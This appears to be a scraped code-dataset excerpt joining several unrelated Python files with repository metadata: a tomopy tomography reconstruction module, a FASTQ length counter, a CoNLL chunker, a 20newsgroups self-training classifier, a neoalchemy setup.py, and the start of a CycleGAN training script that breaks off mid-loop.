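# To apply this migration, the standard Django workflow would be (generic
# commands, not project-specific):
#
#   python manage.py migrate index
#   python manage.py showmigrations index   # verify 0001_initial is applied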
|
[
"shazol.kh@gmail.com"
] |
shazol.kh@gmail.com
|
80c4f2efe33abda42f37afbea34d12a29ba0f188
|
b7a13f1c9e02bacb621febcf63f4245b24e2f6df
|
/tomopy/recon/algorithm.py
|
c48ac3f6a0e224df688857cc577e951a91f56184
|
[] |
no_license
|
AaronBM/tomopy
|
551b94ebf69f546028fb49aaa5d70068cf608c24
|
bca22f8b0b2c9002d3e4fdeeeb99631d40bd085d
|
refs/heads/master
| 2021-01-21T03:02:51.190014
| 2015-05-19T17:22:58
| 2015-05-19T17:22:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,893
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# #########################################################################
# Copyright (c) 2015, UChicago Argonne, LLC. All rights reserved. #
# #
# Copyright 2015. UChicago Argonne, LLC. This software was produced #
# under U.S. Government contract DE-AC02-06CH11357 for Argonne National #
# Laboratory (ANL), which is operated by UChicago Argonne, LLC for the #
# U.S. Department of Energy. The U.S. Government has rights to use, #
# reproduce, and distribute this software. NEITHER THE GOVERNMENT NOR #
# UChicago Argonne, LLC MAKES ANY WARRANTY, EXPRESS OR IMPLIED, OR #
# ASSUMES ANY LIABILITY FOR THE USE OF THIS SOFTWARE. If software is #
# modified to produce derivative works, such modified software should #
# be clearly marked, so as not to confuse it with the version available #
# from ANL. #
# #
# Additionally, redistribution and use in source and binary forms, with #
# or without modification, are permitted provided that the following #
# conditions are met: #
# #
# * Redistributions of source code must retain the above copyright #
# notice, this list of conditions and the following disclaimer. #
# #
# * Redistributions in binary form must reproduce the above copyright #
# notice, this list of conditions and the following disclaimer in #
# the documentation and/or other materials provided with the #
# distribution. #
# #
# * Neither the name of UChicago Argonne, LLC, Argonne National #
# Laboratory, ANL, the U.S. Government, nor the names of its #
# contributors may be used to endorse or promote products derived #
# from this software without specific prior written permission. #
# #
# THIS SOFTWARE IS PROVIDED BY UChicago Argonne, LLC AND CONTRIBUTORS #
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT #
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS #
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL UChicago #
# Argonne, LLC OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, #
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, #
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; #
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER #
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT #
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN #
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE #
# POSSIBILITY OF SUCH DAMAGE. #
# #########################################################################
"""
Module for reconstruction algorithms.
"""
from __future__ import absolute_import, division, print_function
import numpy as np
import tomopy.util.mproc as mproc
import tomopy.util.extern as extern
import tomopy.util.dtype as dtype
from tomopy.sim.project import angles, get_center
import multiprocessing
import logging
logger = logging.getLogger(__name__)
__author__ = "Doga Gursoy"
__copyright__ = "Copyright (c) 2015, UChicago Argonne, LLC."
__docformat__ = 'restructuredtext en'
__all__ = ['recon']
def recon(
tomo, theta, center=None, emission=True, algorithm=None,
init_recon=None, ncore=None, nchunk=None, **kwargs):
"""
Reconstruct object from projection data.
Parameters
----------
tomo : ndarray
3D tomographic data.
theta : array
Projection angles in radian.
center : array, optional
Location of rotation axis.
emission : bool, optional
Determines whether data is emission or transmission type.
algorithm : {str, function}
One of the following string values.
'art'
Algebraic reconstruction technique :cite:`Kak:98`.
'bart'
Block algebraic reconstruction technique.
'fbp'
Filtered back-projection algorithm.
'gridrec'
Fourier grid reconstruction algorithm :cite:`Dowd:99`,
:cite:`Rivers:06`.
'mlem'
Maximum-likelihood expectation maximization algorithm
:cite:`Dempster:77`.
'osem'
Ordered-subset expectation maximization algorithm
:cite:`Hudson:94`.
'ospml_hybrid'
Ordered-subset penalized maximum likelihood algorithm with
weighted linear and quadratic penalties.
'ospml_quad'
Ordered-subset penalized maximum likelihood algorithm with
quadratic penalties.
'pml_hybrid'
Penalized maximum likelihood algorithm with weighted linear
and quadratic penalties :cite:`Chang:04`.
'pml_quad'
Penalized maximum likelihood algorithm with quadratic penalty.
'sirt'
Simultaneous algebraic reconstruction technique.
num_gridx, num_gridy : int, optional
Number of pixels along x- and y-axes in the reconstruction grid.
num_iter : int, optional
Number of algorithm iterations performed.
num_block : int, optional
Number of data blocks for intermediate updating the object.
ind_block : array of int, optional
Order of projections to be used for updating.
reg_par : float, optional
Regularization parameter for smoothing.
init_recon : ndarray, optional
Initial guess of the reconstruction.
ncore : int, optional
Number of cores that will be assigned to jobs.
nchunk : int, optional
Chunk size for each core.
Returns
-------
ndarray
Reconstructed 3D object.
Warning
-------
Filtering is not implemented for fbp.
Example
-------
>>> import tomopy
>>> obj = tomopy.shepp3d() # Generate an object.
>>> ang = tomopy.angles(180) # Generate uniformly spaced tilt angles.
>>> sim = tomopy.project(obj, ang) # Calculate projections.
>>> rec = tomopy.recon(sim, ang, algorithm='art') # Reconstruct object.
>>>
>>> # Show 64th slice of the reconstructed object.
>>> import pylab
>>> pylab.imshow(rec[64], cmap='gray')
>>> pylab.show()
"""
allowed_kwargs = {
'art': ['num_gridx', 'num_gridy', 'num_iter'],
'bart': ['num_gridx', 'num_gridy', 'num_iter',
'num_block', 'ind_block'],
'fbp': ['num_gridx', 'num_gridy', 'filter_name'],
'gridrec': ['num_gridx', 'num_gridy', 'filter_name'],
'mlem': ['num_gridx', 'num_gridy', 'num_iter'],
'osem': ['num_gridx', 'num_gridy', 'num_iter',
'num_block', 'ind_block'],
'ospml_hybrid': ['num_gridx', 'num_gridy', 'num_iter',
'reg_par', 'num_block', 'ind_block'],
'ospml_quad': ['num_gridx', 'num_gridy', 'num_iter',
'reg_par', 'num_block', 'ind_block'],
'pml_hybrid': ['num_gridx', 'num_gridy', 'num_iter', 'reg_par'],
'pml_quad': ['num_gridx', 'num_gridy', 'num_iter', 'reg_par'],
'sirt': ['num_gridx', 'num_gridy', 'num_iter'],
}
# Generate kwargs for the algorithm.
kwargs_defaults = _get_algorithm_kwargs(tomo.shape)
if isinstance(algorithm, str):
if algorithm not in allowed_kwargs:
raise ValueError('Keyword "algorithm" must be one of %s.' %
(list(allowed_kwargs.keys()),))
# Make sure the passed kwargs are allowed for this algorithm.
for key in kwargs:
if key not in allowed_kwargs[algorithm]:
raise ValueError('%s keyword not in allowed keywords %s' %
(key, allowed_kwargs[algorithm]))
# Set kwarg defaults.
for kw in allowed_kwargs[algorithm]:
kwargs.setdefault(kw, kwargs_defaults[kw])
elif algorithm is None:
raise ValueError('Keyword "algorithm" must be one of %s.' %
(list(allowed_kwargs.keys()),))
# Generate args for the algorithm.
args = _get_algorithm_args(tomo.shape, theta, center)
# Initialize tomography data and initial reconstruction.
tomo = _init_tomo(tomo, emission)
recon = _init_recon(
(tomo.shape[1], kwargs['num_gridx'], kwargs['num_gridy']),
init_recon)
return _dist_recon(
tomo, recon, _get_c_func(algorithm), args, kwargs, ncore, nchunk)
def _init_tomo(tomo, emission):
tomo = dtype.as_float32(tomo)
if not emission:
tomo = -np.log(tomo)
return tomo
def _init_recon(shape, init_recon, val=1e-6):
if init_recon is None:
recon = val * np.ones(shape, dtype='float32')
else:
recon = dtype.as_float32(init_recon)
return recon
def _get_c_func(algorithm):
if algorithm == 'art':
func = extern.c_art
elif algorithm == 'bart':
func = extern.c_bart
elif algorithm == 'fbp':
func = extern.c_fbp
elif algorithm == 'gridrec':
func = extern.c_gridrec
elif algorithm == 'mlem':
func = extern.c_mlem
elif algorithm == 'osem':
func = extern.c_osem
elif algorithm == 'ospml_hybrid':
func = extern.c_ospml_hybrid
elif algorithm == 'ospml_quad':
func = extern.c_ospml_quad
elif algorithm == 'pml_hybrid':
func = extern.c_pml_hybrid
elif algorithm == 'pml_quad':
func = extern.c_pml_quad
elif algorithm == 'sirt':
func = extern.c_sirt
return func
def _dist_recon(tomo, recon, algorithm, args, kwargs, ncore, nchunk):
mproc.init_tomo(tomo)
return mproc.distribute_jobs(
recon,
func=algorithm,
args=args,
kwargs=kwargs,
axis=0,
ncore=ncore,
nchunk=nchunk)
def _get_algorithm_args(shape, theta, center):
dx, dy, dz = shape
theta = dtype.as_float32(theta)
center = get_center(shape, center)
return (dx, dy, dz, center, theta)
def _get_algorithm_kwargs(shape):
dx, dy, dz = shape
return {
'num_gridx': dz,
'num_gridy': dz,
'filter_name': np.array('shepp', dtype=(str, 16)),
'num_iter': dtype.as_int32(1),
'reg_par': np.ones(10, dtype='float32'),
'num_block': dtype.as_int32(1),
'ind_block': np.arange(0, dx, dtype='float32'),
}
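# A short usage sketch of the keyword validation above (hypothetical values;
# mirrors the docstring example):
#
#   import numpy as np
#   import tomopy
#   sim = np.ones((180, 4, 64), dtype='float32')
#   ang = tomopy.angles(180)
#   rec = tomopy.recon(sim, ang, algorithm='gridrec')   # OK
#   rec = tomopy.recon(sim, ang, algorithm='gridrec',
#                      num_iter=5)                      # raises ValueError:
#   # 'num_iter' is not among gridrec's allowed keywords
#   # ['num_gridx', 'num_gridy', 'filter_name']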
|
[
"sparsedata@gmail.com"
] |
sparsedata@gmail.com
|
38034b21d34d73cf790818852942f4790e553aa7
|
1c5a8cf45bbba1a50ba5110090e0de7cd70a5677
|
/python/old/seq_lengths2.py
|
a522847e4c4b17cb19885e908fe2b6c05c2062d9
|
[] |
no_license
|
bradleycolquitt/umi
|
d6e45f365c9ce4c2fc694b8d3c7418807ae59a38
|
f9e94974a20872ee373cd5dd91aaf951d90dc295
|
refs/heads/master
| 2021-05-16T02:44:51.127160
| 2017-07-25T17:25:48
| 2017-07-25T17:25:48
| 26,970,700
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 412
|
py
|
#! /usr/bin/env python
import sys
import gzip
import time
def main(argv):
handle = gzip.open(argv[1])
total_seq = 0
lineno = 0
start = time.time()
for l in handle:
# In FASTQ, the sequence is every 4th line, offset by 1
if lineno % 4 == 1:
total_seq += len(l.strip())
lineno += 1
handle.close()
print("Time elapsed: " + str(time.time() - start))
print("Total sequence: " + str(total_seq))
if __name__ == "__main__":
main(sys.argv)
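# Example invocation (the file name is a placeholder; any gzipped FASTQ works):
#
#   python seq_lengths2.py reads.fastq.gz
#
# FASTQ records are 4 lines each (header, sequence, '+', qualities), which is
# why only lines with lineno % 4 == 1 contribute to the total.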
|
[
"bradley.colquitt@gmail.com"
] |
bradley.colquitt@gmail.com
|
7fa32bc0bce678ad3b24a49bff6158fcd8c850f8
|
98895acc9f12800ce7fc0d9e552d455db3489cd1
|
/lab3/ml_chunker_v2.py
|
4d7d410e5d05d3d883a88ee1bc854825fcb87386
|
[] |
no_license
|
Ga22be/EDAN20
|
7a559595c3509648d752ba092b23b03790cc2a49
|
151ed285bc16de3e994a1012cfa7d60082d8b571
|
refs/heads/master
| 2020-07-23T10:10:52.854906
| 2019-10-15T09:48:11
| 2019-10-15T09:48:11
| 207,524,338
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,272
|
py
|
"""
Machine learning chunker for CoNLL 2000
"""
__author__ = "Pierre Nugues"
import time
import conll_reader
from sklearn.feature_extraction import DictVectorizer
from sklearn import svm
from sklearn import linear_model
from sklearn import metrics
from sklearn import tree
from sklearn.naive_bayes import GaussianNB
from sklearn.model_selection import GridSearchCV
def extract_features(sentences, w_size, feature_names):
"""
Builds X matrix and y vector
X is a list of dictionaries and y is a list
:param sentences:
:param w_size:
:return:
"""
X_l = []
y_l = []
for sentence in sentences:
X, y = extract_features_sent(sentence, w_size, feature_names)
X_l.extend(X)
y_l.extend(y)
return X_l, y_l
def extract_features_sent(sentence, w_size, feature_names):
"""
Extract the features from one sentence
returns X and y, where X is a list of dictionaries and
y is a list of symbols
:param sentence: string containing the CoNLL structure of a sentence
:param w_size:
:return:
"""
# We pad the sentence to extract the context window more easily
start = "BOS BOS BOS\n"
end = "\nEOS EOS EOS"
start *= w_size
end *= w_size
sentence = start + sentence
sentence += end
# Each sentence is a list of rows
sentence = sentence.splitlines()
padded_sentence = list()
for line in sentence:
line = line.split()
padded_sentence.append(line)
# print(padded_sentence)
# We extract the features and the classes
# X is a list of feature vectors, where each feature vector is a dictionary
# y is the list of classes
X = list()
y = list()
for i in range(len(padded_sentence) - 2 * w_size):
# x is a row of X
x = list()
# The words in lower case
for j in range(2 * w_size + 1):
x.append(padded_sentence[i + j][0].lower())
# The POS
for j in range(2 * w_size + 1):
x.append(padded_sentence[i + j][1])
# The chunks (Up to the word)
### I overwrite these in predict()
for j in range(w_size):
x.append(padded_sentence[i + j][2])
# We represent the feature vector as a dictionary
X.append(dict(zip(feature_names, x)))
# The classes are stored in a list
y.append(padded_sentence[i + w_size][2])
return X, y
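# A worked example of one feature vector (hypothetical sentence and tags):
# with w_size=2, the row for "cat" in "the/DT/B-NP cat/NN/I-NP sat/VBD/B-VP"
# would be the dict
#
#   {'word_n2': 'bos', 'word_n1': 'the', 'word': 'cat',
#    'word_p1': 'sat', 'word_p2': 'eos',
#    'pos_n2': 'BOS', 'pos_n1': 'DT', 'pos': 'NN',
#    'pos_p1': 'VBD', 'pos_p2': 'EOS',
#    'chunk_n2': 'BOS', 'chunk_n1': 'B-NP'}
#
# i.e. five lower-cased words, five POS tags, and the two chunk tags to the
# left (gold during training; overwritten with predictions in predict()).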
def predict(test_sentences, feature_names, f_out):
for test_sentence in test_sentences:
X_test_dict, y_test = extract_features_sent(test_sentence, w_size, feature_names)
### We need to process word by word as well
y_test_predicted = []
c1 = "BOS"
c2 = "BOS"
### Iterate over the words in the sentence
for w in X_test_dict:
### Overwrite the golden chunks from before
w["chunk_n1"] = c1
w["chunk_n2"] = c2
# Vectorize the test sentence and one hot encoding
X_test = vec.transform(w)
# Predicts the chunks and returns numbers
### Predict the chunk for this iteration
c0 = classifier.predict(X_test)
### Append to the sentence result
y_test_predicted.append(c0[0])
### Save the predicted chunk for future use
c2 = c1
c1 = c0[0]
# Appends the predicted chunks as a last column and saves the rows
rows = test_sentence.splitlines()
rows = [rows[i] + ' ' + y_test_predicted[i] for i in range(len(rows))]
for row in rows:
f_out.write(row + '\n')
f_out.write('\n')
f_out.close()
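# The loop above decodes greedily left to right: chunk_n1/chunk_n2 hold the
# model's own previous predictions rather than gold tags, matching test-time
# conditions. A hypothetical trace for a 3-word sentence:
#   word 1: chunk_n2='BOS',  chunk_n1='BOS'  -> predict 'B-NP'
#   word 2: chunk_n2='BOS',  chunk_n1='B-NP' -> predict 'I-NP'
#   word 3: chunk_n2='B-NP', chunk_n1='I-NP' -> predict 'B-VP'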
if __name__ == '__main__':
start_time = time.perf_counter()
train_corpus = './train.txt'
test_corpus = './test.txt'
w_size = 2 # The size of the context window to the left and right of the word
feature_names = ['word_n2', 'word_n1', 'word', 'word_p1', 'word_p2',
'pos_n2', 'pos_n1', 'pos', 'pos_p1', 'pos_p2',
'chunk_n2', 'chunk_n1']
train_sentences = conll_reader.read_sentences(train_corpus)
print("Extracting the features...")
X_dict, y = extract_features(train_sentences, w_size, feature_names)
print("Encoding the features...")
# Vectorize the feature matrix and carry out a one-hot encoding
vec = DictVectorizer(sparse=True)
X = vec.fit_transform(X_dict)
# The statement below would consume a considerable amount of memory
# X = vec.fit_transform(X_dict).toarray()
# print(vec.get_feature_names())
training_start_time = time.perf_counter()
print("Training the model...")
classifier = linear_model.LogisticRegression(penalty='l2', dual=True, solver='liblinear', multi_class='auto')
# classifier = linear_model.LogisticRegression(penalty='l2', dual=False, solver='lbfgs', multi_class='auto')
# classifier = tree.DecisionTreeClassifier()
# classifier = linear_model.Perceptron()
model = classifier.fit(X, y)
print(model)
test_start_time = time.perf_counter()
# We apply the model to the test set
test_sentences = list(conll_reader.read_sentences(test_corpus))
# Here we carry out a chunk tag prediction and we report the per tag error
# This is done for the whole corpus without regard for the sentence structure
print("Predicting the chunks in the test set...")
X_test_dict, y_test = extract_features(test_sentences, w_size, feature_names)
# Vectorize the test set and one-hot encoding
X_test = vec.transform(X_test_dict) # Possible to add: .toarray()
y_test_predicted = classifier.predict(X_test)
print("Classification report for classifier %s:\n%s\n"
% (classifier, metrics.classification_report(y_test, y_test_predicted)))
# Here we tag the test set and we save it.
# This prediction is redundant with the piece of code above,
# but we need to predict one sentence at a time to have the same
# corpus structure
print("Predicting the test set...")
f_out = open('out_ml_v2', 'w')
predict(test_sentences, feature_names, f_out)
end_time = time.perf_counter()
print("Training time:", (test_start_time - training_start_time) / 60)
print("Test time:", (end_time - test_start_time) / 60)
|
[
"ga22be@live.se"
] |
ga22be@live.se
|
4b2d79da2c70a69a5b40dc5768cc07a4be93ee7a
|
6e17016e71e6a09bf44a4286b12383bd829ed02c
|
/base-semi.py
|
2bcbfea1807fc61800257d959f55964da4581ab6
|
[] |
no_license
|
kazuyaYX/classification
|
0292c8e27844819875e4190a44d7b8f463b0de54
|
d7e54cad0bd307eb32937ced9c7a392a447dfcf3
|
refs/heads/master
| 2021-08-06T16:15:50.499733
| 2017-11-06T12:39:31
| 2017-11-06T12:39:31
| 105,126,963
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,346
|
py
|
from sklearn.datasets import fetch_20newsgroups
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.naive_bayes import MultinomialNB
from sklearn import metrics
from sklearn.ensemble import GradientBoostingClassifier
import sklearn.svm as svm
from sklearn.svm import SVC
from sklearn.externals import joblib
import lda
import numpy as np
class data_20news(object):
def __init__(self):
self.train_labeled = []
self.train_labeled_target = []
self.train_unlabeled = []
self.train_unlabeled_target = []
self.train = []
self.test = []
self.test_target = []
self.target_names = []
def get_train_data(size):
twenty_train = fetch_20newsgroups(subset='train', categories=None)
twenty_test = fetch_20newsgroups(subset='test', categories=None)
balance = [size for i in range(0, 20)]
i = 0
data = data_20news()
twenty_labeled_data = []
twenty_unlabeled_data = []
twenty_train_labeled = []
twenty_train_labeled_un = []
for d in twenty_train.data:
if balance[twenty_train.target[i]] != 0:
twenty_labeled_data.append(d)
twenty_train_labeled.append(twenty_train.target[i])
balance[twenty_train.target[i]] -= 1
else:
twenty_unlabeled_data.append(d)
twenty_train_labeled_un.append(twenty_train.target[i])
i += 1
data.train_labeled = twenty_labeled_data
data.train_labeled_target = twenty_train_labeled
data.train_unlabeled = twenty_unlabeled_data
data.train_unlabeled_target = twenty_train_labeled_un
data.train = twenty_train.data
data.test = twenty_test.data
data.test_target = twenty_test.target
data.target_names = twenty_test.target_names
count = [0 for i in range(0, 20)]
for i in range(0, len(data.train_labeled)):
count[data.train_labeled_target[i]] += 1
print(count)
return data
def lda_self_training(data, n_iter, n_move, threshold):
# count_transformer = get_count_transformer(data.train)
# tfidf_transformer = get_tfidf_transformer(count_transformer)
count_vect = CountVectorizer(stop_words='english')
# count_vect.fit(data.train)
count_vect.fit(data.train)
# count_transformer = count_vect.transform(data.train)
# tfidf_transformer = TfidfTransformer().fit(count_transformer)
lda_model = joblib.load('lda100-1000.pkl')
X_train_labeled_counts = count_vect.transform(data.train_labeled)
X_train_lda = lda_model.transform(X_train_labeled_counts)
clf = None
for i in range(0, n_iter):
clf = svm.SVC(kernel='linear', probability=True).fit(X_train_lda, data.train_labeled_target)
unlabeled_data_lda = lda_model.transform(count_vect.transform(data.train_unlabeled))
predicted = clf.predict(unlabeled_data_lda)
predicted_proba = clf.predict_proba(unlabeled_data_lda)
score_dic = {}
for j in range(0, len(predicted_proba)):
sorted_proba = sorted(predicted_proba[j], reverse=True)
score_dic[j] = sorted_proba[0] - sorted_proba[1]
score_dic = sorted(score_dic.items(), key=lambda d: d[1], reverse=True)
j = 0
balance = [n_move for k in range(0, 20)]
keys = []
for key, score in score_dic:
# print(predicted[key], score)
if j == n_move*20:
break
if balance[predicted[key]] == 0:
continue
balance[predicted[key]] -= 1
if score < threshold:
j += 1
continue
# print(predicted[key], data.train_unlabeled_target[key])
data.train_labeled.append(data.train_unlabeled[key])
# twenty_train_labeled = np.append(twenty_train_labeled, predicted[key])
data.train_labeled_target.append(predicted[key])
keys.append(key)
j += 1
keys = sorted(keys, reverse=True)
for key in keys:
# print(key, len(twenty_unlabeled_data))
del data.train_unlabeled[key]
del data.train_unlabeled_target[key]
X_train_labeled_counts = count_vect.transform(data.train_labeled)
X_train_lda = lda_model.transform(X_train_labeled_counts)
# print(X_train_tf.shape)
# print(len(twenty_train_labeled))
if i % 10 == 0:
clf = svm.SVC(kernel='linear', probability=True).fit(X_train_lda, data.train_labeled_target)
predicted = clf.predict(lda_model.transform(count_vect.transform(data.test)))
print(metrics.classification_report(data.test_target, predicted, target_names=data.target_names))
clf = svm.SVC(kernel='linear', probability=True).fit(X_train_lda, data.train_labeled_target)
predicted = clf.predict(lda_model.transform(count_vect.transform(data.test)))
predicted_proba = clf.predict_proba(lda_model.transform(count_vect.transform(data.test)))
print(metrics.classification_report(data.test_target, predicted, target_names=data.target_names))
joblib.dump(clf, 'lda-' + str(n_iter) + '-' + str(n_move) + '-' + str(threshold) + '.pkl')
return predicted_proba
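# The selection score above is the top-two probability margin. On toy numbers
# (illustrative only): a row [0.70, 0.25, 0.05] scores 0.70 - 0.25 = 0.45 and
# is promoted to the labeled pool early, while [0.40, 0.38, 0.22] scores 0.02
# and is skipped whenever 0.02 < threshold, keeping low-confidence
# self-labels out of the growing training set.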
def tfidf_self_training(data, n_iter, n_move, threshold):
# count_transformer = get_count_transformer(data.train)
# tfidf_transformer = get_tfidf_transformer(count_transformer)
count_vect = CountVectorizer(stop_words='english')
# count_vect.fit(data.train)
count_vect.fit(data.train)
count_transformer = count_vect.transform(data.train)
tfidf_transformer = TfidfTransformer().fit(count_transformer)
X_train_labeled_counts = count_vect.transform(data.train_labeled)
X_train_tfidf = tfidf_transformer.transform(X_train_labeled_counts)
clf = None
for i in range(0, n_iter):
clf = svm.SVC(kernel='linear', probability=True).fit(X_train_tfidf, data.train_labeled_target)
unlabeled_data_tfidf = tfidf_transformer.transform(count_vect.transform(data.train_unlabeled))
predicted = clf.predict(unlabeled_data_tfidf)
predicted_proba = clf.predict_proba(unlabeled_data_tfidf)
score_dic = {}
for j in range(0, len(predicted_proba)):
sorted_proba = sorted(predicted_proba[j], reverse=True)
score_dic[j] = sorted_proba[0] - sorted_proba[1]
score_dic = sorted(score_dic.items(), key=lambda d: d[1], reverse=True)
j = 0
balance = [n_move for k in range(0, 20)]
keys = []
for key, score in score_dic:
# print(predicted[key], score)
if j == n_move*20:
break
if balance[predicted[key]] == 0:
continue
balance[predicted[key]] -= 1
if score < threshold:
j += 1
continue
# print(predicted[key], data.train_unlabeled_target[key])
data.train_labeled.append(data.train_unlabeled[key])
# twenty_train_labeled = np.append(twenty_train_labeled, predicted[key])
data.train_labeled_target.append(predicted[key])
keys.append(key)
j += 1
keys = sorted(keys, reverse=True)
for key in keys:
# print(key, len(twenty_unlabeled_data))
del data.train_unlabeled[key]
del data.train_unlabeled_target[key]
X_train_labeled_counts = count_vect.transform(data.train_labeled)
X_train_tfidf = tfidf_transformer.transform(X_train_labeled_counts)
# print(X_train_tf.shape)
# print(len(twenty_train_labeled))
if i % 10 == 0:
clf = svm.SVC(kernel='linear', probability=True).fit(X_train_tfidf, data.train_labeled_target)
predicted = clf.predict(tfidf_transformer.transform(count_vect.transform(data.test)))
print(metrics.classification_report(data.test_target, predicted, target_names=data.target_names))
clf = svm.SVC(kernel='linear', probability=True).fit(X_train_tfidf, data.train_labeled_target)
predicted = clf.predict(tfidf_transformer.transform(count_vect.transform(data.test)))
predicted_proba = clf.predict_proba(tfidf_transformer.transform(count_vect.transform(data.test)))
print(metrics.classification_report(data.test_target, predicted, target_names=data.target_names))
joblib.dump(clf, 'tfidf-' + str(n_iter) + '-' + str(n_move) + '-' + str(threshold) + '.pkl')
return predicted_proba
def base_semi(predicted_proba1, predicted_proba2, data):
predicted = []
for j in range(0, len(predicted_proba1)):
predicted_proba = []
for p in range(0, len(predicted_proba1[j])):
predicted_proba.append(predicted_proba1[j][p] + predicted_proba2[j][p])
# if j == 5:
# print(predicted_proba)
predicted.append(predicted_proba.index(max(predicted_proba)))
# print(predicted)
print("base-semi:")
print(metrics.classification_report(data.test_target, predicted, target_names=data.target_names))
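# The fusion above is an unweighted sum ensemble. Toy 3-class example
# (illustrative numbers):
#
#   lda:   [0.5, 0.3, 0.2]
#   tfidf: [0.2, 0.5, 0.3]
#   sum:   [0.7, 0.8, 0.5]  -> index of the max is 1, so class 1 is predicted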
if __name__ == '__main__':
data = get_train_data(10)
predicted_proba1 = lda_self_training(data, 201, 1, 0.01)
data = get_train_data(10)
predicted_proba2 = tfidf_self_training(data, 201, 1, 0.01)
base_semi(predicted_proba1, predicted_proba2, data)
|
[
"554810625@qq.com"
] |
554810625@qq.com
|
11d31b02a955790e7ccfb3503a14a6da2560814e
|
cfb268f6090b55b5c51c7aadba3661790c0383ac
|
/setup.py
|
26a4b33b9156f0ee10476b427cfa07a8a1dbb816
|
[
"MIT"
] |
permissive
|
theY4Kman/neoalchemy
|
1ceef03cc17815660d66bfa678f59f149923417c
|
66bf711502247a8464fd15e4256cf596c7c63de0
|
refs/heads/master
| 2016-09-06T16:14:48.406968
| 2014-12-03T22:55:03
| 2014-12-03T22:55:03
| 26,565,319
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,220
|
py
|
import os
from setuptools import setup, find_packages
current_directory = os.path.dirname(__file__)
with open(os.path.join(current_directory, 'requirements.txt')) as fp:
install_requires = fp.readlines()
with open(os.path.join(current_directory, 'test-requirements.txt')) as fp:
tests_require = fp.readlines()
setup(
name='neoalchemy',
version='0.0.1',
description='A SQLAlchemy-like object graph mapper for neo4j',
long_description=open('README.rst').read(),
author='Zach Kanzler',
author_email='they4kman@gmail.com',
zip_safe=True,
url='http://github.com/they4kman/neoalchemy',
license='MIT',
packages=find_packages(),
keywords='graph neo4j py2neo ORM',
tests_require=tests_require,
test_suite='nose.collector',
install_requires=install_requires,
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Database',
])
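# Usage sketch (standard setuptools workflow, nothing project-specific):
#   pip install .          # installs with the requirement pins read above
#   python setup.py test   # runs the nose suite declared via test_suite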
|
[
"they4kman@gmail.com"
] |
they4kman@gmail.com
|
75cc5a62e19034865c2d1b75f42907f97aa06dc8
|
c6c4c066b5c095c1fb9c4888eec34701edabc5a9
|
/CycleGAN/cyclegan_train.py
|
b3b608f91b4010541775471786b84cfaf1ba9c70
|
[
"MIT"
] |
permissive
|
Sunshine352/Awesome-GANs
|
c24b0ae0de13e113423c8b8906e6f5076e10ab26
|
1f6e4a7d9c6a9d4e05ea142592fee2c700542009
|
refs/heads/master
| 2020-03-20T00:54:15.609319
| 2018-06-03T07:29:03
| 2018-06-03T07:29:03
| 137,060,041
| 1
| 0
| null | 2018-06-12T11:07:51
| 2018-06-12T11:07:51
| null |
UTF-8
|
Python
| false
| false
| 6,979
|
py
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import tensorflow as tf
import numpy as np
import sys
import time
import cyclegan_model as cyclegan
sys.path.append('../')
import image_utils as iu
from datasets import Pix2PixDataSet as DataSet
results = {
'output': './gen_img/',
'checkpoint': './model/checkpoint',
'model': './model/CycleGAN-model.ckpt'
}
train_step = {
'epochs': 201,
'batch_size': 8,
'logging_step': 100,
}
def main():
start_time = time.time() # Clocking start
# GPU configure
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
with tf.Session(config=config) as s:
image_size = crop_size = 128
# CycleGAN Model
model = cyclegan.CycleGAN(s,
input_height=image_size,
input_width=image_size,
input_channel=3,
batch_size=train_step['batch_size'])
        # vangogh2photo (Pix2Pix) DataSet images
data_set_name = 'vangogh2photo'
ds = DataSet(input_height=image_size,
input_width=image_size,
input_channel=3,
crop_size=crop_size,
batch_size=train_step['batch_size'],
name=data_set_name)
img_a = ds.images_a
img_b = ds.images_b
print("[*] image A shape : ", img_a.shape)
print("[*] image B shape : ", img_b.shape)
n_sample = model.sample_num
sample_image_height = model.sample_size
sample_image_width = model.sample_size
sample_dir_a = results['output'] + 'valid_a.png'
sample_dir_b = results['output'] + 'valid_b.png'
sample_a, sample_b = img_a[:n_sample], img_b[:n_sample]
sample_a = np.reshape(sample_a, [-1] + model.image_shape[1:])
sample_b = np.reshape(sample_b, [-1] + model.image_shape[1:])
# Generated image save
iu.save_images(sample_a, [sample_image_height, sample_image_width], sample_dir_a)
iu.save_images(sample_b, [sample_image_height, sample_image_width], sample_dir_b)
print("[+] pre-processing elapsed time : {:.8f}s".format(time.time() - start_time))
# Initializing
s.run(tf.global_variables_initializer())
global_step = 0
for epoch in range(train_step['epochs']):
# learning rate decay
lr_decay = 1.
if epoch >= 100 and epoch % 10 == 0:
lr_decay = (train_step['epochs'] - epoch) / (train_step['epochs'] / 2.)
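            # e.g. with epochs=201, at epoch 150:
            #   lr_decay = (201 - 150) / (201 / 2.) = 51 / 100.5 ~= 0.507
            # Note the decayed value is only computed on every 10th epoch;
            # all other epochs run with lr_decay = 1.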
# re-implement DataIterator for multi-input
